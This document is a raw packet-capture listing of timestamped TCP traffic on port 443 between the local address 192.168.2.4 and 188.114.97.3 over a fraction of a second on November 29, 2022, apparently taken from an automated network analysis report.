                                  Nov 29, 2022 16:55:23.032645941 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032679081 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.032699108 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.033704996 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.033746004 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.033838987 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.033850908 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.033920050 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.033976078 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.033994913 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.034006119 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.034032106 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.034142971 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.034771919 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.034809113 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.034904957 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.034915924 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.034938097 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.034969091 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.035101891 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.035115004 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.035532951 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.035587072 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.035624981 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.035635948 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.035670042 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.035712004 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036243916 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.036278009 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.036340952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036351919 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.036364079 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036395073 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036490917 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.036514997 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.036551952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036562920 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.036588907 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036612034 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.036911964 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.037240028 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.037278891 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.037465096 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.037465096 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.037486076 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.037631989 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.037672043 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.037699938 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.037713051 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.037725925 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.037767887 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.038261890 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.038300037 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.038351059 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.038367033 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.038381100 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.038827896 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.038866997 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.038903952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.038918972 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.038969994 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.039004087 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.039195061 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.039225101 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.039303064 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.039316893 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.039361000 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.039671898 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.039705038 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.039745092 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.039756060 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.039796114 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.039813995 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.040158033 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.040198088 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.040230989 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.040246964 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.040261984 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.040282011 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.040555000 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.040587902 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.040623903 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.040633917 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.040666103 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.040685892 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041201115 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041243076 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041316986 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041335106 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041352987 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041379929 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041527987 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041573048 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041599989 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041611910 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041652918 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041670084 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041673899 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041688919 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041721106 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.041726112 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041768074 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.041776896 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.042197943 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.042515993 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.042553902 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.042591095 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.042601109 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.042638063 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.042661905 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.042905092 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.042943954 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.042979956 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.042990923 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043042898 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043061972 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043262005 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043302059 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043329000 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043337107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043374062 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043395042 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043406010 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043431997 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043459892 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043473005 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.043495893 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043519974 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.043715000 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044146061 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044178009 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044220924 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044256926 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044265985 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044298887 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044320107 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044439077 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044469118 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044502974 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044511080 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044543982 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044564962 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044790030 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044831991 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044859886 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044874907 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044893026 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044918060 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044931889 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044960022 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.044987917 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.044996977 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.045023918 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.045042992 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.045608044 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.045679092 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.045710087 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.045725107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.045809984 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046030998 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046077013 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046109915 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046123981 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046169043 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046232939 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046478987 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046523094 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046577930 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046591043 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046669006 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046756983 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046804905 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046828032 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046840906 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.046863079 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.046909094 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.047086000 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.047128916 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.047162056 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.047175884 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.047199011 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.047219992 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.052373886 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.052426100 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.052542925 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.052572012 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.052608013 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.052644014 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.052680969 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.052691936 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.052720070 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.052753925 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.052999020 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053030014 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053092003 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053105116 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053127050 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053147078 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053493023 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053524971 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053586006 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053601980 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053632975 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053653955 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053796053 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053828955 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053881884 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.053894043 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.053939104 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054156065 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054191113 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054244995 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054258108 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054279089 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054306984 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054569006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054651976 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054666042 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054686069 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054725885 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054748058 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054817915 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054842949 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054893017 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054908037 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.054933071 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.054955006 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055241108 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055268049 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055309057 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055321932 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055351973 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055388927 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055599928 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055634975 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055666924 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055676937 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055721998 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055744886 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055752039 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055895090 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055931091 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.055965900 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.055974960 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056020021 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.056458950 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056489944 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056561947 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.056571007 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056628942 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.056726933 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056756973 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056814909 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.056824923 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.056890965 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.057074070 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057107925 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057174921 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.057188988 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057265043 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.057522058 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057575941 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057709932 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057742119 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.057760000 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057811022 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.057936907 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057965040 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.057991982 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.058001995 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.058034897 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.058152914 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.058183908 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.058208942 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.058218956 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.058234930 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.067889929 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.068164110 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088365078 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088412046 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088557959 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088557005 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088584900 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088618994 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088624001 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088670969 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088680029 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088745117 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088779926 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088814020 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088825941 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088887930 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088900089 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088913918 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.088934898 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.088952065 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089004993 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089015007 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089087963 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089128017 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089155912 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089165926 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089190006 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089262962 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089304924 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089322090 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089332104 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089387894 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089421034 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089449883 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089476109 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089488029 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089509010 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089566946 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089603901 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089607954 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089622021 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089653015 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089694977 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089735985 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089766026 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089813948 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089823008 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089855909 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089864969 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089910030 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.089910030 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089929104 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.089962006 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090013027 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090044022 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090075970 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090122938 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090131044 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090156078 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090184927 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090265036 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090270996 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090298891 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090356112 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090486050 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090513945 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090544939 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090585947 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090595961 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.090616941 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.090997934 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.091068029 CET44349697188.114.97.3192.168.2.4
